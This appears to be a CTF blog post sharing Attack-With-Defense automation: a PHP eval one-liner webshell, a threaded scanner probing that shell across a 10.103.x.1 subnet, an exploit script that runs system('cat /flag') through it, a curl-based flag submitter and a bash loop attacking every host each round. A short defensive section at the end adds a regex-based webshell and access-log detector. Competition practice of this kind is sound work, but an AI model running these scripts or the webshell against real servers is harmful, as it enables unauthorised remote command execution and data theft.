AWD one-liner webshell batch attack scripts


I had been preparing a few batch attack scripts for AWD from pwn/web write-ups but had never used them in practice. At the Shanghai finals I debugged a batch attack script for a one-liner webshell on site, and it ate quite a bit of time... It is adapted from a pwn script, so a web player's version would probably be more concise than mine. Good enough for now.

Scanning IPs

The one-liner webshell lives at /assets/scripts/pass.php with the following content:

```php
<?php @eval($_POST['pass']);?>
```

When collecting hosts, the URL format has to be rewritten to the path of the webshell file. init_hosts.py is as follows:

```python
import requests
import threading

# Coloured printers: orange for hits, red for misses
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

def check_ip(i):
    # Probe the webshell path on host 10.103.<i>.1
    url = f'http://10.103.{i}.1/assets/scripts/pass.php'
    try:
        response = requests.get(url, timeout=0.5)
        if response.status_code == 200:
            li('[+] ' + url)
            with open('hosts', 'a+') as f:   # reachable targets
                f.write(url + '\n')
        else:
            raise Exception("Not 200 OK")
    except Exception as e:
        ll('[-] ' + url)
        with open('h', 'a+') as f:           # unreachable targets
            f.write(url + '\n')

NUM_THREADS = 256

threads = []
for i in range(1, 256):
    thread = threading.Thread(target=check_ip, args=(i,))
    threads.append(thread)
    thread.start()

    # Throttle: wait for the current batch once NUM_THREADS are running
    if len(threads) >= NUM_THREADS:
        for t in threads:
            t.join()
        threads = []

for t in threads:
    t.join()
```

Attack script

The connection password in data needs to be changed to match the target; in this challenge it is pass. exp.py is as follows:

```python
import requests
import sys

def write_to_flags(d):
    # Append one flag per line to ./flags
    fd = open('./flags', 'ab')
    fd.write(d + b'\n')
    fd.close()

url = sys.argv[1]
print(url)

# Key is the webshell's connection password; value is the PHP to execute
data = {
    "pass": "system('cat /flag');"
}

response = requests.post(url=url, data=data)

if response.status_code == 200:
    flag = response.text.strip()
    print(flag)
    write_to_flags(flag.encode())
    print("Flag 已写入到 flags 文件中。")
else:
    print("获取 flag 失败:", response.status_code)
```

Batch flag submission script

The URL format also took me a while... I need to relearn Python. submit_flag.py is as follows:

```python
import threading
import os
import requests

flag_file = './flags'
threads = []

def submit(flag):
    try:
        # url = 'https://ctf.bugku.com/awd/submit.html?token=88b02ce3b420ec1f4b4a2e02dd6fe305&flag=' + flag[:-1]
        #url = f"curl -X POST http://27.25.152.77:19999/api/flag -H 'Authorization: 7f120ca9b0e3024d06734a04a986cc55' -d '{{ \"flag\": \"{flag[:-1]}\"}}'"
        # Build the curl command for this platform's JSON submit API; flag[:-1] drops the trailing newline
        url = "curl -k -H \"Content-Type:application/json\" -X POST -d '{\"token\": \"0c9651851218f216253a2b0d84d24cfd\", \"flag\":\""
        url += flag[:-1]
        url += "\", \"pk\":\"be7e7b26c6a5235bcedc8531d6bfd648\"}\' \'https://10.10.26.231/api/awd/batch_flag/\'"
        print(url)
        # r = requests.get(url)
        os.system(url)
        print('\x1b[01;38;5;214m[+] pwned!\x1b[0m')
    except Exception as e:
        print('\x1b[01;38;5;214m[-] connect fail: {}\x1b[0m'.format(str(e)))

def main():
    # One submission thread per line in ./flags
    with open(flag_file) as flag_txt:
        flags = flag_txt.readlines()
        for flag in flags:
            thread = threading.Thread(target=submit, args=(flag,))
            threads.append(thread)
            thread.start()

        for thread in threads:
            thread.join()

if __name__ == "__main__":
    main()
```

Batch attack script

The batch attack script attack.sh is as follows:

```bash
#!/bin/bash

attack_times=10000
round_wait_time=30        # seconds between rounds
wait_submit_time=5        # seconds to wait before submitting flags
log_file="logs"
run_time=120              # per-target timeout for exp.py (seconds)
next_attack_time=2.5      # delay between launching targets (seconds)
max_concurrent_attacks=10 # Max number of concurrent attacks

log(){
    t=$(date "+%H:%M:%S")
    m="[$t]$1"
    info="\033[43;37m $m \033[0m"
    echo -e "$info"
    echo -e "$m" >> "$log_file"
}

attack() {
    # Archive last round's flags, then start this round with an empty file
    echo "-- round $1 -- " >> all_flags
    [ -f flags ] && cat flags >> all_flags
    rm -f flags
    local jobs=0
    for line in $(cat hosts); do
        timeout --foreground "$run_time" python3 ./exp.py "$line" &
        sleep "$next_attack_time"
        ((jobs++))
        if [ "$jobs" -ge "$max_concurrent_attacks" ]; then
            wait # Wait for all background jobs to finish
            jobs=0
        fi
    done
    wait # Ensure all attacks are complete before moving on
    echo -e "\x1b[47;30m Waiting $wait_submit_time s to submit flag\x1b[0m"
    sleep "$wait_submit_time"
    echo -e "\x1b[47;30m Submitting flag\x1b[0m"
    python3 ./submit_flag.py
}

for ((i=1; i <= attack_times; i++)); do
    m="-------- round $i --------"
    log "$m"
    attack "$i"
    echo -e "\x1b[47;30m Waiting next round\x1b[0m"
    sleep "$round_wait_time"
done
```
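On the defending side of the same AWD round, the one-liner at /assets/scripts/pass.php is exactly what has to be found and removed from your own box. The following is an added example (not part of the original post) that walks a web root for PHP files feeding a request superglobal into eval()/assert()/system() and flags POSTs to those files in a combined-format access log; the web root, file contents and log lines are constructed, and the pattern list is an assumption.

```python
import os
import re
import tempfile

# A request superglobal fed straight into an execution primitive, e.g.
# <?php @eval($_POST['pass']);?>  (assumed pattern list, case-insensitive)
SHELL_RE = re.compile(
    r"@?\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
# Combined-format access log: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def find_webshells(root):
    """Return [(web_path, matched_text)] for every PHP file under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="ignore") as f:
                for m in SHELL_RE.finditer(f.read()):
                    web_path = "/" + os.path.relpath(path, root).replace(os.sep, "/")
                    hits.append((web_path, m.group(0)))
    return hits

def flag_posts(log_lines, shell_paths):
    """Return (client_ip, path, status) for POSTs that reach a detected shell."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(2) == "POST" and m.group(3).split("?")[0] in shell_paths:
            out.append((m.group(1), m.group(3), m.group(4)))
    return out

def demo():
    """Constructed web root and log lines; returns (hits, flagged_requests)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "assets", "scripts"))
    with open(os.path.join(root, "assets", "scripts", "pass.php"), "w") as f:
        f.write("<?php @eval($_POST['pass']);?>")                # the one-liner from the post
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo htmlspecialchars($_GET['q']); ?>")   # benign, must not match
    hits = find_webshells(root)
    log = [  # constructed access-log lines
        '10.103.7.1 - - [12/May/2024:10:00:00 +0800] "POST /assets/scripts/pass.php HTTP/1.1" 200 42',
        '10.103.7.1 - - [12/May/2024:10:00:01 +0800] "GET /index.php?q=1 HTTP/1.1" 200 512',
    ]
    return hits, flag_posts(log, {p for p, _ in hits})
```

Run find_webshells against the real web root during the defence phase and feed the resulting paths to flag_posts over the live access log to see which opponents are already using the shell.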
